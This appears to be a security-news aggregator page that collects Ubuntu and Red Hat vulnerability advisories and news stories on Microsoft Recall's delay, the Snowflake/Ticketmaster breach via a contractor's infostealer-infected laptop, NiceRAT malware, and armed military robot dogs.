CVE-2023-52595, CVE-2023-52597,   CVE-2023-52598, CVE-2023-52599, CVE-2023-52606, CVE-2023-52607,   CVE-2023-52608, CVE-2023-52609, CVE-2023-52610, CVE-2023-52611,   CVE-2023-52612, CVE-2023-52614, CVE-2023-52616, CVE-2023-52617,   CVE-2023-52618, CVE-2023-52619, CVE-2023-52621, CVE-2023-52622,   CVE-2023-52623, CVE-2023-52626, CVE-2023-52627, CVE-2023-52632,   CVE-2023-52633, CVE-2023-52635, CVE-2023-52664, CVE-2023-52666,   CVE-2023-52667, CVE-2023-52669, CVE-2023-52670, CVE-2023-52672,   CVE-2023-52674, CVE-2023-52675, CVE-2023-52676, CVE-2023-52677,   CVE-2023-52678, CVE-2023-52679, CVE-2023-52680, CVE-2023-52681,   CVE-2023-52682, CVE-2023-52683, CVE-2023-52685, CVE-2023-52686,   CVE-2023-52687, CVE-2023-52690, CVE-2023-52691, CVE-2023-52692,   CVE-2023-52693, CVE-2023-52694, CVE-2023-52696, CVE-2023-52697,   CVE-2023-52698, CVE-2023-6356, CVE-2023-6535, CVE-2023-6536,   CVE-2024-21823, CVE-2024-23849, CVE-2024-24860, CVE-2024-26582,   CVE-2024-26583, CVE-2024-26584, CVE-2024-26585, CVE-2024-26586,   CVE-2024-26592, CVE-2024-26594, CVE-2024-26595, CVE-2024-26598,   CVE-2024-26607, CVE-2024-26608, CVE-2024-26610, CVE-2024-26612,   CVE-2024-26615, CVE-2024-26616, CVE-2024-26618, CVE-2024-26620,   CVE-2024-26623, CVE-2024-26625, CVE-2024-26627, CVE-2024-26629,   CVE-2024-26631, CVE-2024-26632, CVE-2024-26633, CVE-2024-26634,   CVE-2024-26636, CVE-2024-26638, CVE-2024-26640, CVE-2024-26641,   CVE-2024-26644, CVE-2024-26645, CVE-2024-26646, CVE-2024-26647,   CVE-2024-26649, CVE-2024-26668, CVE-2024-26669, CVE-2024-26670,   CVE-2024-26671, CVE-2024-26673, CVE-2024-26808, CVE-2024-35835,   CVE-2024-35837, CVE-2024-35838, CVE-2024-35839, CVE-2024-35840,   CVE-2024-35841, CVE-2024-35842Package Information:   https://launchpad.net/ubuntu/+source/linux-nvidia-6.5/6.5.0-1021.22

Ubuntu Security Notice USN-6818-3

Red Hat Security Advisory 2024-3939-03 - An update for linux-firmware is now available for Red Hat Enterprise Linux 7.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3939.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: linux-firmware security update  
Advisory ID:        RHSA-2024:3939-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3939  
Issue date:         2024-06-17  
Revision:           03  
CVE Names:          CVE-2022-27635  
====================================================================

Summary: 

An update for linux-firmware is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The linux-firmware packages contain all of the firmware files that are required by various devices to operate.

Security Fix(es):

* hw: intel: Protection mechanism failure for some Intel(R) PROSet/Wireless WiFi (CVE-2022-46329)

* hw: intel: Improper access control for some Intel(R) PROSet/Wireless WiFi (CVE-2022-27635)

* hw: intel: Improper access control for some Intel(R) PROSet/Wireless WiFi (CVE-2022-40964)

* hw: intel: Improper input validation in some Intel(R) PROSet/Wireless WiFi (CVE-2022-36351)

* hw: intel: Improper input validation in some Intel(R) PROSet/Wireless WiFi (CVE-2022-38076)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-27635

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2238960  
https://bugzilla.redhat.com/show_bug.cgi?id=2238961  
https://bugzilla.redhat.com/show_bug.cgi?id=2238962  
https://bugzilla.redhat.com/show_bug.cgi?id=2238963  
https://bugzilla.redhat.com/show_bug.cgi?id=2238964

Red Hat Security Advisory 2024-3939-03

Microsoft has announced that its Copilot+PC's Recall feature will be delayed due to privacy concerns and security risks.

Microsoft has announced it will postpone the broadly available preview of the heavily discussed Recall feature for Copilot+ PCs. Copilot+ PCs are personal computers that come equipped with several artificial intelligence (AI) features.

The Recall feature tracks anything from web browsing to voice chats. The idea is that Recall can assist users to reconstruct past activity by taking regular screenshots of a user’s activity and storing them locally. The user would then be able to search the database for anything they’ve seen on their PC.

However, Recall received heavy criticism by security researchers and privacy advocates since it was announced last month. The ensuing discussion saw a lot of contradictory statements. For example, Microsoft claimed that Recall would be disabled by default, while the original documentation said otherwise.

Researchers demonstrated how easy it was to extract and search through Recall snapshots on a compromised system. While some may remark that the compromised system is the problem in that equation—and they are not wrong—Recall would potentially provide an attacker with a lot of information that normally would not be accessible. Basically, it would be a goldmine that spyware and information stealers could easily access and search.

In Microsoft’s own words:

> “Recall does not perform content moderation. It will not hide information such as passwords or financial account numbers. That data may be in snapshots that are stored on your device, especially when sites do not follow standard internet protocols like cloaking password entry.”

Microsoft didn’t see the problem, with its vice chair and president, Brad Smith even using Recall as an example to demonstrate how Microsoft is secure during the Committee Hearing: A Cascade of Security Failures: Assessing Microsoft Corporation’s Cybersecurity Shortfalls and the Implications for Homeland Security.

But now things have changed, and Recall will now only be available for participants in the Windows Insider Program (WIP) in the coming weeks, instead of being rolled out to all Copilot+ PC users on June 18 as originally planned.

Another security measure taken only as an afterthought was that users will now have to log into Windows Hello in order to activate Recall and to view your screenshot timeline.

In its blog, Microsoft indicates it will act on the feedback it expects to receive from WIP users.

> “This decision is rooted in our commitment to providing a trusted, secure and robust experience for all customers and to seek additional feedback prior to making the feature available to all Copilot+ PC users.”

Our hope is that the WIP community will convince Microsoft to abandon the whole Recall idea. If not, we will make sure to let you know how you can disable it or use it more securely if you wish to do so.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Microsoft Recall delayed after privacy and security concerns 

A ShinyHunters hacker tells WIRED that they gained access to Ticketmaster’s Snowflake cloud account—and others—by first breaching a third-party contractor.

Hackers who stole terabytes of data from Ticketmaster and other customers of the cloud storage firm Snowflake claim they obtained access to some of the Snowflake accounts by first breaching a Belarusian-founded contractor that works with those customers.

About 165 customer accounts were potentially affected in the recent hacking campaign targeting Snowflake’s customers, but only a few of these have been identified so far. In addition to Ticketmaster, the banking firm Santander has also acknowledged that their data was stolen but declined to identify the account from which it was stolen. Wired, however, has independently confirmed that it was a Snowflake account; the stolen data included bank account details for 30 million customers, including 6 million account numbers and balances, 28 million credit card numbers, and human resources information about staff, according to a post published by the hackers. Lending Tree and Advance Auto Parts have also said they might be victims as well.

Snowflake has not revealed details about how the hackers accessed the accounts, saying only that the intruders did not directly breach Snowflake’s network. This week, Google-owned security firm Mandiant, one of the companies engaged by Snowflake to investigate the breaches, revealed in a blog post that in some cases the hackers first obtained access through third-party contractors, without identifying the contractors or stating how this access aided the hackers in breaching the Snowflake accounts.

But according to one of the hackers who spoke with WIRED through a text chat, one of those firms was EPAM Systems, a publicly traded software engineering and digital services firm, founded by Belarus-born Arkadiy Dobkin, with current revenue of around $4.8 billion. The hacker says his group, which calls themselves ShinyHunters, used data found on an EPAM employee system to gain access to some of the Snowflake accounts.

EPAM told WIRED that it does not believe that it played a role in the breaches and suggested the hacker had fabricated the tale. ShinyHunters has been around since 2020 and has been responsible for numerous breaches since then that involve stealing large troves of data and leaking or selling it online.

Snowflake is a large data storage and analysis firm that provides tools for companies to derive intelligence and insight from customer data. EPAM develops software and provides various managed services for customers worldwide, primarily in North America, Europe, Asia, and Australia, according to its web site, with about 60 percent of its revenue coming from customers in North America. Among the services EPAM provides customers is assistance with using and managing their Snowflake accounts to store and analyze their data. EPAM claims it has some 300 workers who are experienced in using Snowflake’s data analytics tools and services, and announced in 2022 that it had attained “Elite Tier Partner” status with Snowflake to leverage the latter’s analytics platform for its customers.

EPAM’s founder emigrated from Belarus to the US in the ’90s before founding his company in 1993 from his New Jersey apartment. Nearly two-thirds of EPAM’s 55,000 employees resided in Ukraine, Belarus, and Russia until Russia invaded Ukraine, at which point the company says it closed its Russia operations and moved some of its Ukrainian workers to locations outside of that country.

The hacker who spoke with WIRED says that a computer belonging to one of EPAM’s employees in Ukraine was infected with info-stealer malware through a spear-phishing attack. It’s unclear if someone from ShinyHunters conducted this initial breach or just purchased access to the infected system from someone else who hacked the worker and installed the infostealer. The hacker says that once on the EPAM worker’s system, they installed a remote-access Trojan, giving them complete access to everything on the worker’s computer.

Using this access, they say, they found unencrypted usernames and passwords that the worker used to access and manage EPAM customers’ Snowflake accounts, including an account for Ticketmaster. The hacker says the credentials were stored on the worker’s machine in a project management tool called Jira. The hackers were able to use those credentials, they say, to access the Snowflake accounts because the Snowflake accounts didn’t require multifactor authentication (MFA) to access them. (MFA requires that users type in a one-time temporary code in addition to a username and password, making accounts that use MFA more secure.)

While EPAM denies it was involved in the breach, hackers did steal data from Snowflake accounts including Ticketmaster's, and have extorted the owners of the data by demanding hundreds of thousands, and in some cases more than a million, dollars to destroy the data or risk having the hackers sell it elsewhere.

The hacker who spoke with WIRED didn’t identify all of the victims breached through EPAM but did indicate that Ticketmaster was one of them. Ticketmaster did not respond to a request for comment from WIRED. But Ticketmaster’s parent company, Live Nation, has acknowledged that data was stolen from its Snowflake account in May without revealing how much data was stolen or how the hackers accessed the Snowflake account. In a post offering the data for sale, however, the hackers indicated that they had taken data on 560 million Ticketmaster consumers.

The hacker claims that in some cases they were able to directly access the Snowflake account of EPAM customers using the plaintext usernames and passwords they found on the EPAM worker’s computer. But in cases where Snowflake credentials weren’t stored on the worker’s system, the hacker claims they sifted through stockpiles of old credentials stolen in previous breaches by hackers using infostealer malware and found additional usernames and passwords for Snowflake accounts, including ones harvested from the machine of the same EPAM worker in Ukraine.

Credentials harvested by infostealers are often posted online or made available for sale on hacker forums. If victims don’t change their login credentials after a breach, or don’t know their data has been stolen, those credentials can remain active and available for years. It’s especially problematic if those credentials are used across multiple accounts; hackers can identify the user through the email address they use as a login credential, and if that person reuses the same password, hackers can simply try those credentials in multiple places.

The hackers in this case say they were able to use credentials stolen by an infostealer in 2020 to access Snowflake accounts.

WIRED wasn’t able to independently confirm that the hackers were inside the EPAM worker’s machine or used EPAM to gain access to Ticketmaster’s data and other Snowflake accounts, but the hacker provided WIRED with a file that appears to be a list of EPAM worker credentials lifted from the company’s Active Directory database after they gained access to the worker’s computer.

Furthermore, in the blog post written by Mandiant, which was published after the hacker told WIRED about his group’s use of data harvested by infostealers, the security firm revealed that the hackers who breached Snowflake accounts used old data siphoned by infostealers to access some of the accounts. Mandiant said that about 80 percent of the victims it identified in the Snowflake campaign were compromised using credentials that had previously been stolen and exposed by infostealers.

And an independent security researcher who has been helping to negotiate the ransom transactions between the ShinyHunter hackers and victims of the Snowflake campaign pointed WIRED to an online repository of data harvested by an infostealer that includes data siphoned from the computer of the EPAM worker in Ukraine that the hacker says was used to gain access to the Snowflake accounts. This stolen data includes the worker’s browser history, which reveals the worker’s complete name. It also includes an internal EPAM URL pointing to Ticketmaster’s Snowflake account, as well as a plaintext version of the username and password that the EPAM worker used to access the Ticketmaster Snowflake account.

“This means that \[an EPAM worker\] who had access to that Snowflake \[account\] had password-stealing malware on their computer, and their password was stolen and sold on the dark web,” says the researcher, who asked to be identified only as Reddington, an identity they use online to communicate with cybercriminals. “This means that anyone that knew the correct URL to \[Ticketmaster’s\] Snowflake could have simply looked up the password, logged in, and stolen the data.”

An EPAM spokesperson did not seem to be aware when contacted by WIRED early this week that its company allegedly played a role in breaches of Snowflake accounts. “We do not comment on situations to which we are not a part,” she wrote in an email, suggesting the company did not believe it played any role in the campaign. When WIRED provided the spokeswoman with details about how the hackers say they obtained access to the system of an EPAM worker in Ukraine, she replied, “Hackers frequently spread false information to advance their agendas. We maintain a policy of not engaging with misinformation and consistently uphold robust security measures to protect our operations and customers. We are continuing our exhaustive investigation and, at this time, see no evidence to suggest that we have been affected or involved in this matter.”

WIRED followed up by providing the name of the Ukrainian worker whose machine the hackers allegedly compromised, as well as the username and password the worker used for accessing Ticketmaster’s Snowflake account, but the spokesperson did not respond to any additional questions.

It’s possible the ShinyHunter hackers did not directly hack the EPAM worker, and simply gained access to the Snowflake accounts using usernames and passwords they obtained from old repositories of credentials stolen by info stealers. But, as Reddington points out, this means that anyone else can sift through those repositories for these and other credentials stolen from EPAM accounts. Reddington says they found data online that was used by nine different infostealers to harvest data from the machines of EPAM workers. This raises potential concerns about the security of data belonging to other EPAM customers.

EPAM has customers across various critical industries, including banks and other financial services, health care, broadcast networks, pharmaceutical, energy and other utilities, insurance, and software and hi-tech—the latter customers include Microsoft, Google, Adobe, and Amazon Web Services. It’s not clear, however, if any of these companies have Snowflake accounts to which EPAM workers have access. WIRED also wasn’t able to confirm whether Ticketmaster, Santander, Lending Tree, or Advance AutoParts are EPAM customers.

The Snowflake campaign also highlights the growing security risks from third-party companies in general and from infostealers. In its blog post this week, Mandiant suggested that multiple contractors were breached to gain access to Snowflake accounts, noting that contractors—often known as business process outsourcing (BPO) companies—are a potential gold mine for hackers, because compromising the machine of a contractor that has access to the accounts of multiple customers can give them direct access to many customer accounts.

“Contractors that customers engage to assist with their use of Snowflake may utilize personal and/or non-monitored laptops that exacerbate this initial entry vector,” wrote Mandiant in its blog post. “These devices, often used to access the systems of multiple organizations, present a significant risk. If compromised by infostealer malware, a single contractor's laptop can facilitate threat actor access across multiple organizations, often with IT and administrator-level privileges.”

The company also highlighted the growing risk from infostealers, noting that the majority of the credentials the hackers used in the Snowflake campaign came from repositories of data previously stolen by various infostealer campaigns, some of which dated as far back as 2020. “Mandiant identified hundreds of customer Snowflake credentials exposed via infostealers since 2020,” the company noted.

This, accompanied by the fact that the targeted Snowflake accounts didn’t use MFA to further protect them, made the breaches in this campaign possible, Mandiant notes.

Snowflake’s CISO, Brad Jones, acknowledged last week that the lack of multifactor authentication enabled the breaches. In a phone call this week, Jones told WIRED that Snowflake is working on giving its customers the ability to mandate that users of their accounts employ multifactor authentication going forward, “and then we’ll be looking in the future to \[make the\] default MFA,” he says.

_Update 6/17/2024, 5:45 pm EDT: The article was updated to clarify the details that Santander has publicly revealed about the hack._

Hackers Detail How They Allegedly Stole Ticketmaster Data From Snowflake

Threat actors have been observed deploying a malware called NiceRAT to co-opt infected devices into a botnet.
The attacks, which target South Korean users, are designed to propagate the malware under the guise of cracked software, such as Microsoft Windows, or tools that purport to offer license verification for Microsoft Office.
"Due to the nature of crack programs, information sharing amongst

Threat actors have been observed deploying a malware called NiceRAT to co-opt infected devices into a botnet.

The attacks, which target South Korean users, are designed to propagate the malware under the guise of cracked software, such as Microsoft Windows, or tools that purport to offer license verification for Microsoft Office.

"Due to the nature of crack programs, information sharing amongst ordinary users contributes to the malware's distribution independently from the initial distributor," the AhnLab Security Intelligence Center (ASEC) said.

"Because threat actors typically explain ways to remove anti-malware programs during the distribution phase, it is difficult to detect the distributed malware."

Alternate distribution vectors involve the use of a botnet comprising zombie computers that are infiltrated by a remote access trojan (RAT) known as NanoCore RAT, mirroring prior activity that leveraged the Nitol DDoS malware for propagating another malware dubbed Amadey Bot.

NiceRAT is an actively developed open-source RAT and stealer malware written in Python that uses a Discord Webhook for command-and-control (C2), allowing the threat actors to siphon sensitive information from the compromised host.

First released on April 17, 2024, the current version of the program is 1.1.0. It's also available as a premium version, according to its developer, suggesting that it's advertised under the malware-as-a-service (MaaS) model.

The development comes amid the return of a cryptocurrency mining botnet referred to as Bondnet, which has been detected using the high-performance miner bots as C2 servers since 2023 by configuring a reverse proxy using a modified version of a legitimate tool called Fast Reverse Proxy (FRP).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

NiceRAT Malware Targets South Korean Users via Cracked Software

The United States and China appear locked in a race to weaponize four-legged robots for military applications.

The Chinese military recently unveiled a new kind of battle buddy for its soldiers: a “robot dog” with a machine gun strapped to its back.

In video distributed by the state-run news agency CCTV, People's Liberation Army personnel are shown operating on a testing range alongside a four-legged robot with what appears to be a variant of the standard-issue 5.8 x 42-mm QBZ-95 assault rifle mounted on it as part of China’s recent Golden Dragon 24 joint military exercises with Cambodia in the Gulf of Thailand. In one scenario, Chinese soldiers stand on either side of a doorway while the robot dog enters the building ahead of them; in another, the robot fires off a burst of bullets as it advances on a target.

“It can serve as a new member in our urban combat operations, replacing our members to conduct reconnaissance and identify enemy \[sic\] and strike the target during our training,” one Chinese soldier shown operating the robot told CCTV.

This isn’t the first time the Chinese military-industrial complex has shown off an armed robot dog. In October 2022, Chinese defense company Kestrel Defense published a video showing an unmanned aerial vehicle air-dropping a quadrupedal ground vehicle affixed with a 5.8 x 42-mm QBB-97 light machine gun on a roof during an urban warfare experiment. The company had previously released footage of robot dogs outfitted with combat systems that included everything from smoke grenades to loitering munitions. And as recently as this March, Chinese researchers claimed that tests involving robot dogs outfitted with an unidentified 7.62-mm rifle (likely a variant of the Type 56 assault rifle that’s based on the ubiquitous Soviet-made AK-47) yielded marksmanship that rivaled trained Chinese sharpshooters, according to the South China Morning Post.

China’s demonstration clearly rankled international observers, prompting at least one American lawmaker to call on the US Defense Department for a report on “rifle-toting robot dogs” and their potential national security implications. But if the Chinese military is pioneering the weaponization of robot dogs, then the United States military isn’t far behind.

In the past year, the Pentagon has experimented with outfitting quadrupedal ground robots with its standard-issue 5.56 x 45-mm M4A1 carbine, the 6.8-mm XM7 rifle that the US Army is in the process of adopting under its Next Generation Squad Weapon program, and even the M72 Light Anti-Tank Weapon that’s been in service with American troops since the Vietnam War. Just weeks before CCTV published its footage of armed robot dogs in action, Marine Corps Special Operations Command (MARSOC) revealed that it was experimenting with adding mounted gun systems based on defense contractor Onyx’s artificial intelligence-enabled SENTRY remote weapons system to its own mechanized canines.

American defense officials have been quick to emphasize that the development of weaponized robot dogs is, at this stage, purely experimental, intended to help military planners “explore the realm of the possible” when it comes to the potential applications of revolutionary robotic systems in a future conflict, as one Army official put it last August. But with Army soldiers conducting urban assault drills alongside robot dogs and the Marine Corps increasingly eyeing mechanical quadrupeds to augment future formations with “intelligent robotics,” it may not be too long before the US military is forced to seriously consider adopting armed robot canines for combat before China does.

“Why are we acting surprised by this? It was so obviously coming,” Peter W. Singer, a senior fellow at the Washington, DC-based think tank New America and expert on advanced military technology, tells WIRED. “The first wheeled and tracked \[explosive ordnance disposal\] robots had cameras on them to inspect roadside bombs, then someone added guns to them; the same thing with the Predator drone, which started out unarmed until the military strapped missiles to it. Armed robotics has been a trendline for years.”

A human-machine integration test using the Ghost Robotic Dog and the US Army Small Multipurpose Equipment Transport at Fort Irwin, California, March 15, 2024.Photograph: Spc. Samarion Hicks/U.S. Army/DVIDS

**Man’s Best Friend**

Quadrupedal robots aren’t a new development in the annals of military technology. In 2005, robotics leader Boston Dynamics unveiled BigDog, a four-legged mechanical “pack mule” that was intended to haul weapons and supplies for US troops over terrain considered unwelcoming to traditional wheeled or tracked ground vehicles. Funded by the Defense Advanced Research Projects Agency and adopted as the Legged Squad Support System by the Marine Corps Warfighting Laboratory, BigDog was eventually deemed too loud for practical use and discontinued after a decade and more than $40 million invested in the much-hyped project.

Despite BigDog’s shortcomings, the underlying research behind the system eventually gave rise to Spot, a smaller and quieter “robot dog” that Boston Dynamics debuted in 2015. While too small to lug around gear and weapons, the system immediately had clear military applications for everything from base perimeter security to remote site inspection. In the years since its introduction, Spot has proven the platform-defining vision of quadrupedal ground robots, inspiring both collaborators like Asylon Robotics’ DroneDog and alleged imitators like Ghost Robotics’ Vision 60 to compete for a slice of the Defense Department’s growing robotics budget.

Based on publicly available media in Defense Visual Information Distribution Service (DVIDS), the Pentagon’s media distribution hub, the adoption of robot dogs across the US military didn’t start in earnest until 2020, when the Air Force integrated a handful of Ghost Robotics systems into what’s called an “agile combat employment” exercise at Nellis Air Force Base in Nevada, which saw airmen work with their new best friends to secure an airfield against a simulated attack. Just a few months later, officials at Tyndall Air Force Base in Florida became the first US military installation in the world to incorporate the semiautonomous robot dogs into its base security regimen.

“These dogs will be an extra set of eyes and ears while computing large amounts of data at strategic locations throughout Tyndall Air Force Base,” Major Jordan Criss, 325th Security Forces Squadron commander, said of the systems during initial testing in late 2020. “They will be a huge enhancement for our defenders and allow flexibility in the posting and response of our personnel.”

In the intervening years, robot dogs have become an increasingly common fixture across the US military, beyond patrolling sensitive installations. In July 2023, Minot Air Force Base in North Dakota introduced robot dogs to enable airmen to respond to chemical, biological, radiological, and nuclear threats “without risking the safety of themselves or others.” In August, Patrick Space Force Base in Florida added robot dogs to its perimeter security rotation for an “additional detection and alert capability.” That same month, the Naval Surface Warfare Center, Philadelphia Division, announced the employment of robot dogs to “build 3-D ship models aboard the ‘mothballed’ fleet of decommissioned ships at the Philadelphia Navy Yard,” while the Coast Guard unveiled four-legged “droid” dogs in Hawaii to “combat weapons of mass destruction.” Finally, in November, airmen at Barksdale Air Force Base in Louisiana debuted robot dogs for explosive ordnance disposal.

Despite these practical noncombat applications, some robotics companies have had an eye on weaponization. In October 2021, Ghost Robotics showed off a so-called “Special Purpose Unmanned Rifle,” or SPUR, quadrupedal robot with an 6.5-mm Creedmoor assault rifle developed by SWORD International mounted on its back during an annual Army weapons expo in Washington, DC, in the first public example of a robot dog armed with a firearm. The following year, a video of a robot dog outfitted with a PP-19 Vityaz submachine gun by Russian entrepreneur Alexander Atamov quickly went viral on YouTube and Twitter. By 2023, an American company had debuted a robot dog with a flamethrower strapped to its back, albeit not explicitly for military use (no longer fielded to US soldiers, using flamethrowers against enemy combatants is technically not prohibited). Like the Predator drone, you can’t build a new robot without someone slapping a weapon on it.

**Cry Havoc**

The public reception to weaponized robot dogs is overwhelmingly defined by concern mixed with discomfort, especially given the rise of autonomous or semiautonomous weapon systems that can independently track and identify targets. Even beyond the conventional invocation of _Terminator_\-inspired techno-anxiety, the robot dogs appear eerily reminiscent of the menacing mechanized canines of _Black Mirror_.

Part of the creep factor stems from the “uncanny valley,” says Singer, invoking the psychological phenomenon in which robots that look and act almost-but-not-quite natural end up unnerving their human observers. “On the engineering side, these robots take inspiration from nature, since real dogs are, through evolution, designed to operate really well in the field,” Singer says. “As a result, we layer our beliefs about these types of creatures on top of ‘bioinspired’ robots, and the more something acts lifelike but not likelike, the more we react with fear or disgust.”

Such anxiety over armed robot dogs even prompted six leading robotics companies—led by Spot pioneer Boston Dynamics—to release a letter in October 2022 promising to prohibit military customers from weaponizing their robots for combat purposes. (SPUR creator Ghost Robotics was not a signatory.)

“We believe that adding weapons to robots that are remotely or autonomously operated, widely available to the public, and capable of navigating to previously inaccessible locations where people live and work, raises new risks of harm and serious ethical issues,” the companies wrote. “Weaponized applications of these newly-capable robots will also harm public trust in the technology in ways that damage the tremendous benefits they will bring to society.”

To be fair, both the US military and American robotics companies have urged caution when it comes to developing autonomous weapons systems. Upon unveiling the SPUR, late Ghost Robotics CEO Jiren Parikh emphasized that the armed robot always has an operator in the loop, with no AI or autonomy-related systems that could potentially falter under extreme circumstances. And while the SENTRY turret that MARSOC is reportedly testing affixed to a pair of robot dogs does use AI to scan for and identify targets, the company also emphasized that the decision to engage with the weapon system is completely reliant on a human operator. While the idea of armed robot dogs with minds of their own running amok may be a recent addition to Americans’ dystopian imagination, the US military-industrial complex appears firmly focused on keeping humans in control at all times.

Ghost Robotics Quadruped Unmanned Ground Vehicles (Q-UGV) pose for a photo at Cape Canaveral Space Force Station, Florida, in July 2022.Photograph: Senior Airman Samuel Becker/U.S. Space Force/DVIDS

Despite understandable concerns over their growing role in military affairs, anxiety over packs of armed robot dogs operating on a future battlefield may be premature, according to Sam Bendett, an analyst at the Virginia-based Center for Naval Analyses think tank whose research focuses on robotics and unmanned systems. While footage of armed robot dogs may alarm the average observer, these systems are currently nowhere near agile or versatile enough to make practical sense on chaotic battlefields.

“I had a chance to operate \[a robot dog\] at an AI conference in the Netherlands last year, and it doesn’t have the same dexterity you would expect from a quadruped,” Bendett tells WIRED. “It’s not quite as dexterous, as flexible, or as fast in how it operates. Apart from videos of them doing push-ups and shit like that, it doesn’t run, it can maybe jog, but it can’t even make a turn quite as fast as a tracked or wheeled unmanned ground vehicle.”

“The battlefield is full of man-made and natural countermeasures,” he adds. “That doesn't mean the US and China won't try it out, but it’ll just be in a more limited capacity.”

The Chinese military exercise spotlighted on CCTV may appear concerning, but it’s still a controlled exercise in a managed, relatively stable environment, Bendett says. Until robot dogs demonstrate that they can navigate “the debris of the battlefield” under less-than-ideal conditions, they’ll remain something of a mechanical novelty for military planners.

“Yes, they’re neat, they’re cool,” Bendett says. “But show me a video of a pack of these moving on their own through a forest, not just walking by tapping their feet at every step but actually jogging between trees the way I would with a dog. Then we’ll get to the point where these are actual combat dogs.”

It’s unclear what the future of robot dogs might look like in the ranks of the US military, or even the Chinese military. While they’ve certainly proved useful in augmenting base security and conducting hazardous operations like explosive ordnance disposal, their potential combat applications remain understandably ambiguous. But given American and Chinese military planners’ ongoing experiments with armed robot dogs, the future of warfare may involve not just the grind of tank treads and the roar of helicopter rotors, but the metallic patter of four-legged death across distant battlefields.

Tag

#intel